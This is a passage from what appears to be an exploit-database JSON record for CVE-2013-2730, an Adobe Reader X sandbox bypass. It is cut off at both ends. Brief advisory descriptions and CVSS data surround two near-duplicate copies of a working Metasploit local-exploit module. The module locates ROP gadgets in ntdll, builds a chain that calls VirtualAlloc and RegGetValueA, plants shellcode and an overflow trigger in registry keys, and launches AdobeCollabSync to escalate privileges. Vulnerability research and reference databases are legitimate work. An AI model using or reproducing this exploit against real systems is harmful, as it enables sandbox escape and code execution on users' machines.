acrord32[\"return\"] \nif @addresses['AcroRd32.exe'] == 0 \nfail_with(Exploit::Failure::NoTarget, \"AcroRd32.exe process not found\") \nend \nvprint_good(\"AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}\") \n \nprint_status(\"Checking the AcroRd32.exe image...\") \nif not check_trigger \nfail_with(Exploit::Failure::NoTarget, \"Please check the target, the AcroRd32.exe process doesn't match with the target\") \nend \n \nprint_status(\"Checking the Process Integrity Level...\") \nif not low_integrity_level? \nfail_with(Exploit::Failure::NoTarget, \"Looks like you don't need this Exploit since you're already enjoying Medium Level\") \nend \n \nprint_status(\"Collecting necessary addresses for exploit...\") \ncollect_addresses \n \nprint_status(\"Searching the gadgets needed to build the ROP chain...\") \nsearch_gadgets \nprint_good(\"Gadgets collected...\") \n \nprint_status(\"Building the ROP chain...\") \nbuf = create_rop_chain \nprint_good(\"ROP chain ready...\") \n \nprint_status(\"Storing the shellcode and the trigger in the Registry...\") \nstore_data_registry(buf) \n \nprint_status(\"Executing AdobeCollabSync.exe...\") \ntrigger_overflow \nend \nend \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121711/adobe_sandbox_adobecollabsync.rb.txt"}], "zdt": [{"lastseen": "2018-04-10T01:46:49", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing to achieve Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This Metasploit module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.", "modified": "2013-05-24T00:00:00", "published": "2013-05-24T00:00:00", "id": "1337DAY-ID-20799", "href": "https://0day.today/exploit/description/20799", "type": "zdt", "title": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Registry\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Adobe Reader X Sandbox. The\r\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\r\n process to write register values which can be used to trigger a buffer overflow on\r\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\r\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\r\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Felipe Andres Manzano', # Vulnerability discovery and PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2730' ],\r\n [ 'OSVDB', '93355' ],\r\n [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'SessionTypes' => 'meterpreter',\r\n 'Payload' =>\r\n {\r\n 'Space' => 12288,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Adobe Reader X 10.1.4 / Windows 7 SP1',\r\n {\r\n 'AdobeCollabSyncTrigger' => 0x18fa0,\r\n 'AdobeCollabSyncTriggerSignature' => \"\\x56\\x68\\xBC\\x00\\x00\\x00\\xE8\\xF5\\xFD\\xFF\\xFF\"\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate'=> 'May 14 2013'\r\n }))\r\n\r\n end\r\n\r\n def on_new_session\r\n print_status(\"Deleting Malicious Registry Keys...\")\r\n if not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\")\r\n print_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode by yourself\")\r\n end\r\n if not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\")\r\n print_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB by yourself\")\r\n end\r\n print_status(\"Cleanup finished\")\r\n end\r\n\r\n # Test the process integrity level by trying to create a directory on the TEMP folder\r\n # Access should be granted with Medium Integrity Level\r\n # Access should be denied with Low Integrity Level\r\n # Usint this solution atm because I'm experiencing problems with railgun when trying\r\n # use GetTokenInformation\r\n def low_integrity_level?\r\n tmp_dir = expand_path(\"%TEMP%\")\r\n cd(tmp_dir)\r\n new_dir = \"#{rand_text_alpha(5)}\"\r\n begin\r\n session.shell_command_token(\"mkdir #{new_dir}\")\r\n rescue\r\n return true\r\n end\r\n\r\n if directory?(new_dir)\r\n session.shell_command_token(\"rmdir #{new_dir}\")\r\n return false\r\n else\r\n return true\r\n end\r\n end\r\n\r\n def check_trigger\r\n signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)\r\n if signature == target['AdobeCollabSyncTriggerSignature']\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def collect_addresses\r\n # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe\r\n @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']\r\n vprint_good(\"AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}\")\r\n\r\n # find kernel32.dll\r\n kernel32 = session.railgun.kernel32.GetModuleHandleA(\"kernel32.dll\")\r\n @addresses['kernel32.dll'] = kernel32[\"return\"]\r\n if @addresses['kernel32.dll'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find kernel32.dll\")\r\n end\r\n vprint_good(\"kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}\")\r\n\r\n # find kernel32.dll methods\r\n virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"VirtualAlloc\")\r\n @addresses['VirtualAlloc'] = virtual_alloc[\"return\"]\r\n if @addresses['VirtualAlloc'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find VirtualAlloc\")\r\n end\r\n vprint_good(\"VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}\")\r\n\r\n reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"RegGetValueA\")\r\n @addresses['RegGetValueA'] = reg_get_value[\"return\"]\r\n if @addresses['RegGetValueA'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find RegGetValueA\")\r\n end\r\n vprint_good(\"RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}\")\r\n\r\n # find ntdll.dll\r\n ntdll = session.railgun.kernel32.GetModuleHandleA(\"ntdll.dll\")\r\n @addresses['ntdll.dll'] = ntdll[\"return\"]\r\n if @addresses['ntdll.dll'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find ntdll.dll\")\r\n end\r\n vprint_good(\"ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}\")\r\n end\r\n\r\n # Search a gadget identified by pattern on the process memory\r\n def search_gadget(base, offset_start, offset_end, pattern)\r\n mem = base + offset_start\r\n length = offset_end - offset_start\r\n mem_contents = session.railgun.memread(mem, length)\r\n return mem_contents.index(pattern)\r\n end\r\n\r\n # Search for gadgets on ntdll.dll\r\n def search_gadgets\r\n ntdll_text_base = 0x10000\r\n search_length = 0xd6000\r\n\r\n @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x89\\x0f\\xc3\")\r\n if @gadgets['mov [edi], ecx # ret'].nil?\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'mov [edi], ecx # ret'\")\r\n end\r\n @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']\r\n @gadgets['mov [edi], ecx # ret'] += ntdll_text_base\r\n vprint_good(\"Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}\")\r\n\r\n @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2\r\n vprint_good(\"Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}\")\r\n\r\n @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x5f\\xc3\")\r\n if @gadgets['pop edi # ret'].nil?\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'pop edi # ret'\")\r\n end\r\n @gadgets['pop edi # ret'] += @addresses['ntdll.dll']\r\n @gadgets['pop edi # ret'] += ntdll_text_base\r\n vprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}\")\r\n\r\n @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x59\\xc3\")\r\n if @gadgets['pop ecx # ret'].nil?\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'pop ecx # ret'\")\r\n end\r\n @gadgets['pop ecx # ret'] += @addresses['ntdll.dll']\r\n @gadgets['pop ecx # ret'] += ntdll_text_base\r\n vprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}\")\r\n end\r\n\r\n def store(buf, data, address)\r\n i = 0\r\n while (i < data.length)\r\n buf << [@gadgets['pop edi # ret']].pack(\"V\")\r\n buf << [address + i].pack(\"V\") # edi\r\n buf << [@gadgets['pop ecx # ret']].pack(\"V\")\r\n buf << data[i, 4].ljust(4,\"\\x00\") # ecx\r\n buf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\")\r\n i = i + 4\r\n end\r\n return i\r\n end\r\n\r\n def create_rop_chain\r\n mem = 0x0c0c0c0c\r\n\r\n buf = [0x58000000 + 1].pack(\"V\")\r\n buf << [0x58000000 + 2].pack(\"V\")\r\n buf << [0].pack(\"V\")\r\n buf << [0x58000000 + 4].pack(\"V\")\r\n\r\n buf << [0x58000000 + 5].pack(\"V\")\r\n buf << [0x58000000 + 6].pack(\"V\")\r\n buf << [0x58000000 + 7].pack(\"V\")\r\n buf << [@gadgets['ret']].pack(\"V\")\r\n buf << rand_text(8)\r\n\r\n # Allocate Memory To store the shellcode and the necessary data to read the\r\n # shellcode stored in the registry\r\n buf << [@addresses['VirtualAlloc']].pack(\"V\")\r\n buf << [@gadgets['ret']].pack(\"V\")\r\n buf << [mem].pack(\"V\") # lpAddress\r\n buf << [0x00010000].pack(\"V\") # SIZE_T dwSize\r\n buf << [0x00003000].pack(\"V\") # DWORD flAllocationType\r\n buf << [0x00000040].pack(\"V\") # flProtect\r\n\r\n # Put in the allocated memory the necessary data in order to read the\r\n # shellcode stored in the registry\r\n # 1) The reg sub key: Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\r\n reg_key = \"Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\x00\"\r\n reg_key_length = store(buf, reg_key, mem)\r\n # 2) The reg entry: shellcode\r\n value_key = \"shellcode\\x00\"\r\n store(buf, value_key, mem + reg_key_length)\r\n # 3) The output buffer size: 0x3000\r\n size_buffer = 0x3000\r\n buf << [@gadgets['pop edi # ret']].pack(\"V\")\r\n buf << [mem + 0x50].pack(\"V\") # edi\r\n buf << [@gadgets['pop ecx # ret']].pack(\"V\")\r\n buf << [size_buffer].pack(\"V\") # ecx\r\n buf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\")\r\n\r\n # Copy the shellcode from the the registry to the\r\n # memory allocated with executable permissions and\r\n # ret into there\r\n buf << [@addresses['RegGetValueA']].pack(\"V\")\r\n buf << [mem + 0x1000].pack(\"V\") # ret to shellcode\r\n buf << [0x80000001].pack(\"V\") # hkey => HKEY_CURRENT_USER\r\n buf << [mem].pack(\"V\") # lpSubKey\r\n buf << [mem + 0x3c].pack(\"V\") # lpValue\r\n buf << [0x0000FFFF].pack(\"V\") # dwFlags => RRF_RT_ANY\r\n buf << [0].pack(\"V\") # pdwType\r\n buf << [mem + 0x1000].pack(\"V\") # pvData\r\n buf << [mem + 0x50].pack(\"V\") # pcbData\r\n end\r\n\r\n # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry\r\n def store_data_registry(buf)\r\n vprint_status(\"Creating the Registry Key to store the shellcode...\")\r\n\r\n if registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\")\r\n vprint_good(\"Registry Key created\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to create the Registry Key to store the shellcode\")\r\n end\r\n\r\n vprint_status(\"Storing the shellcode in the Registry...\")\r\n\r\n if registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"shellcode\", payload.encoded, \"REG_BINARY\")\r\n vprint_good(\"Shellcode stored\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to store shellcode in the Registry\")\r\n end\r\n\r\n # Create the Malicious registry entry in order to exploit....\r\n vprint_status(\"Creating the Registry Key to trigger the Overflow...\")\r\n if registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\")\r\n vprint_good(\"Registry Key created\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to create the Registry Entry to trigger the Overflow\")\r\n end\r\n\r\n vprint_status(\"Storing the trigger in the Registry...\")\r\n if registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"bDeleteDB\", buf, \"REG_BINARY\")\r\n vprint_good(\"Trigger stored\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to store the trigger in the Registry\")\r\n end\r\n end\r\n\r\n def trigger_overflow\r\n vprint_status(\"Creating the thread to trigger the Overflow on AdobeCollabSync.exe...\")\r\n # Create a thread in order to execute the necessary code to launch AdobeCollabSync\r\n ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, \"CREATE_SUSPENDED\", nil)\r\n if ret['return'] < 1\r\n print_error(\"Unable to CreateThread\")\r\n return\r\n end\r\n hthread = ret['return']\r\n\r\n vprint_status(\"Resuming the Thread...\")\r\n # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!\r\n ret = client.railgun.kernel32.ResumeThread(hthread)\r\n if ret['return'] < 1\r\n fail_with(Exploit::Failure::Unknown, \"Unable to ResumeThread\")\r\n end\r\n end\r\n\r\n def check\r\n @addresses = {}\r\n acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\")\r\n @addresses['AcroRd32.exe'] = acrord32[\"return\"]\r\n if @addresses['AcroRd32.exe'] == 0\r\n return Msf::Exploit::CheckCode::Unknown\r\n elsif check_trigger\r\n return Msf::Exploit::CheckCode::Vulnerable\r\n else\r\n return Msf::Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n def exploit\r\n @addresses = {}\r\n @gadgets = {}\r\n\r\n print_status(\"Verifying we're in the correct target process...\")\r\n acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\")\r\n @addresses['AcroRd32.exe'] = acrord32[\"return\"]\r\n if @addresses['AcroRd32.exe'] == 0\r\n fail_with(Exploit::Failure::NoTarget, \"AcroRd32.exe process not found\")\r\n end\r\n vprint_good(\"AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}\")\r\n\r\n print_status(\"Checking the AcroRd32.exe image...\")\r\n if not check_trigger\r\n fail_with(Exploit::Failure::NoTarget, \"Please check the target, the AcroRd32.exe process doesn't match with the target\")\r\n end\r\n\r\n print_status(\"Checking the Process Integrity Level...\")\r\n if not low_integrity_level?\r\n fail_with(Exploit::Failure::NoTarget, \"Looks like you don't need this Exploit since you're already enjoying Medium Level\")\r\n end\r\n\r\n print_status(\"Collecting necessary addresses for exploit...\")\r\n collect_addresses\r\n\r\n print_status(\"Searching the gadgets needed to build the ROP chain...\")\r\n search_gadgets\r\n print_good(\"Gadgets collected...\")\r\n\r\n print_status(\"Building the ROP chain...\")\r\n buf = create_rop_chain\r\n print_good(\"ROP chain ready...\")\r\n\r\n print_status(\"Storing the shellcode and the trigger in the Registry...\")\r\n store_data_registry(buf)\r\n\r\n print_status(\"Executing AdobeCollabSync.exe...\")\r\n trigger_overflow\r\n end\r\nend\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20799"}], "metasploit": [{"lastseen": "2019-03-31T17:54:48", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing to achieve Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.", "modified": "2017-07-24T13:26:21", "published": "2013-05-18T17:44:24", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/ADOBE_SANDBOX_ADOBECOLLABSYNC", "href": "", "type": "metasploit", "title": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Windows::Registry\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',\n 'Description' => %q{\n This module exploits a vulnerability on Adobe Reader X Sandbox. The\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\n process to write register values which can be used to trigger a buffer overflow on\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Felipe Andres Manzano', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2730' ],\n [ 'OSVDB', '93355' ],\n [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]\n ],\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'SessionTypes' => 'meterpreter',\n 'Payload' =>\n {\n 'Space' => 12288,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'Adobe Reader X 10.1.4 / Windows 7 SP1',\n {\n 'AdobeCollabSyncTrigger' => 0x18fa0,\n 'AdobeCollabSyncTriggerSignature' => \"\\x56\\x68\\xBC\\x00\\x00\\x00\\xE8\\xF5\\xFD\\xFF\\xFF\"\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate'=> 'May 14 2013'\n }))\n\n end\n\n def on_new_session\n print_status(\"Deleting Malicious Registry Keys...\")\n if not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\")\n print_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode by yourself\")\n end\n if not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\")\n print_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB by yourself\")\n end\n print_status(\"Cleanup finished\")\n end\n\n # Test the process integrity level by trying to create a directory on the TEMP folder\n # Access should be granted with Medium Integrity Level\n # Access should be denied with Low Integrity Level\n # Usint this solution atm because I'm experiencing problems with railgun when trying\n # use GetTokenInformation\n def low_integrity_level?\n tmp_dir = session.sys.config.getenv('TEMP')\n cd(tmp_dir)\n new_dir = \"#{rand_text_alpha(5)}\"\n begin\n session.shell_command_token(\"mkdir #{new_dir}\")\n rescue\n return true\n end\n\n if directory?(new_dir)\n session.shell_command_token(\"rmdir #{new_dir}\")\n return false\n else\n return true\n end\n end\n\n def check_trigger\n signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)\n if signature == target['AdobeCollabSyncTriggerSignature']\n return true\n end\n return false\n end\n\n def collect_addresses\n # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe\n @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']\n vprint_good(\"AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}\")\n\n # find kernel32.dll\n kernel32 = session.railgun.kernel32.GetModuleHandleA(\"kernel32.dll\")\n @addresses['kernel32.dll'] = kernel32[\"return\"]\n if @addresses['kernel32.dll'] == 0\n fail_with(Failure::Unknown, \"Unable to find kernel32.dll\")\n end\n vprint_good(\"kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}\")\n\n # find kernel32.dll methods\n virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"VirtualAlloc\")\n @addresses['VirtualAlloc'] = virtual_alloc[\"return\"]\n if @addresses['VirtualAlloc'] == 0\n fail_with(Failure::Unknown, \"Unable to find VirtualAlloc\")\n end\n vprint_good(\"VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}\")\n\n reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"RegGetValueA\")\n @addresses['RegGetValueA'] = reg_get_value[\"return\"]\n if @addresses['RegGetValueA'] == 0\n fail_with(Failure::Unknown, \"Unable to find RegGetValueA\")\n end\n vprint_good(\"RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}\")\n\n # find ntdll.dll\n ntdll = session.railgun.kernel32.GetModuleHandleA(\"ntdll.dll\")\n @addresses['ntdll.dll'] = ntdll[\"return\"]\n if @addresses['ntdll.dll'] == 0\n fail_with(Failure::Unknown, \"Unable to find ntdll.dll\")\n end\n vprint_good(\"ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}\")\n end\n\n # Search a gadget identified by pattern on the process memory\n def search_gadget(base, offset_start, offset_end, pattern)\n mem = base + offset_start\n length = offset_end - offset_start\n mem_contents = session.railgun.memread(mem, length)\n return mem_contents.index(pattern)\n end\n\n # Search for gadgets on ntdll.dll\n def search_gadgets\n ntdll_text_base = 0x10000\n search_length = 0xd6000\n\n @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x89\\x0f\\xc3\")\n if @gadgets['mov [edi], ecx # ret'].nil?\n fail_with(Failure::Unknown, \"Unable to find gadget 'mov [edi], ecx # ret'\")\n end\n @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']\n @gadgets['mov [edi], ecx # ret'] += ntdll_text_base\n vprint_good(\"Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}\")\n\n @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2\n vprint_good(\"Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}\")\n\n @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x5f\\xc3\")\n if @gadgets['pop edi # ret'].nil?\n fail_with(Failure::Unknown, \"Unable to find gadget 'pop edi # ret'\")\n end\n @gadgets['pop edi # ret'] += @addresses['ntdll.dll']\n @gadgets['pop edi # ret'] += ntdll_text_base\n vprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}\")\n\n @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x59\\xc3\")\n if @gadgets['pop ecx # ret'].nil?\n fail_with(Failure::Unknown, \"Unable to find gadget 'pop ecx # ret'\")\n end\n @gadgets['pop ecx # ret'] += @addresses['ntdll.dll']\n @gadgets['pop ecx # ret'] += ntdll_text_base\n vprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}\")\n end\n\n def store(buf, data, address)\n i = 0\n while (i < data.length)\n buf << [@gadgets['pop edi # ret']].pack(\"V\")\n buf << [address + i].pack(\"V\") # edi\n buf << [@gadgets['pop ecx # ret']].pack(\"V\")\n buf << data[i, 4].ljust(4,\"\\x00\") # ecx\n buf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\")\n i = i + 4\n end\n return i\n end\n\n def create_rop_chain\n mem = 0x0c0c0c0c\n\n buf = [0x58000000 + 1].pack(\"V\")\n buf << [0x58000000 + 2].pack(\"V\")\n buf << [0].pack(\"V\")\n buf << [0x58000000 + 4].pack(\"V\")\n\n buf << [0x58000000 + 5].pack(\"V\")\n buf << [0x58000000 + 6].pack(\"V\")\n buf << [0x58000000 + 7].pack(\"V\")\n buf << [@gadgets['ret']].pack(\"V\")\n buf << rand_text(8)\n\n # Allocate Memory To store the shellcode and the necessary data to read the\n # shellcode stored in the registry\n buf << [@addresses['VirtualAlloc']].pack(\"V\")\n buf << [@gadgets['ret']].pack(\"V\")\n buf << [mem].pack(\"V\") # lpAddress\n buf << [0x00010000].pack(\"V\") # SIZE_T dwSize\n buf << [0x00003000].pack(\"V\") # DWORD flAllocationType\n buf << [0x00000040].pack(\"V\") # flProtect\n\n # Put in the allocated memory the necessary data in order to read the\n # shellcode stored in the registry\n # 1) The reg sub key: Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\n reg_key = \"Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\x00\"\n reg_key_length = store(buf, reg_key, mem)\n # 2) The reg entry: shellcode\n value_key = \"shellcode\\x00\"\n store(buf, value_key, mem + reg_key_length)\n # 3) The output buffer size: 0x3000\n size_buffer = 0x3000\n buf << [@gadgets['pop edi # ret']].pack(\"V\")\n buf << [mem + 0x50].pack(\"V\") # edi\n buf << [@gadgets['pop ecx # ret']].pack(\"V\")\n buf << [size_buffer].pack(\"V\") # ecx\n buf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\")\n\n # Copy the shellcode from the the registry to the\n # memory allocated with executable permissions and\n # ret into there\n buf << [@addresses['RegGetValueA']].pack(\"V\")\n buf << [mem + 0x1000].pack(\"V\") # ret to shellcode\n buf << [0x80000001].pack(\"V\") # hkey => HKEY_CURRENT_USER\n buf << [mem].pack(\"V\") # lpSubKey\n buf << [mem + 0x3c].pack(\"V\") # lpValue\n buf << [0x0000FFFF].pack(\"V\") # dwFlags => RRF_RT_ANY\n buf << [0].pack(\"V\") # pdwType\n buf << [mem + 0x1000].pack(\"V\") # pvData\n buf << [mem + 0x50].pack(\"V\") # pcbData\n end\n\n # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry\n def store_data_registry(buf)\n vprint_status(\"Creating the Registry Key to store the shellcode...\")\n\n if registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\")\n vprint_good(\"Registry Key created\")\n else\n fail_with(Failure::Unknown, \"Failed to create the Registry Key to store the shellcode\")\n end\n\n vprint_status(\"Storing the shellcode in the Registry...\")\n\n if registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"shellcode\", payload.encoded, \"REG_BINARY\")\n vprint_good(\"Shellcode stored\")\n else\n fail_with(Failure::Unknown, \"Failed to store shellcode in the Registry\")\n end\n\n # Create the Malicious registry entry in order to exploit....\n vprint_status(\"Creating the Registry Key to trigger the Overflow...\")\n if registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\")\n vprint_good(\"Registry Key created\")\n else\n fail_with(Failure::Unknown, \"Failed to create the Registry Entry to trigger the Overflow\")\n end\n\n vprint_status(\"Storing the trigger in the Registry...\")\n if registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"bDeleteDB\", buf, \"REG_BINARY\")\n vprint_good(\"Trigger stored\")\n else\n fail_with(Failure::Unknown, \"Failed to store the trigger in the 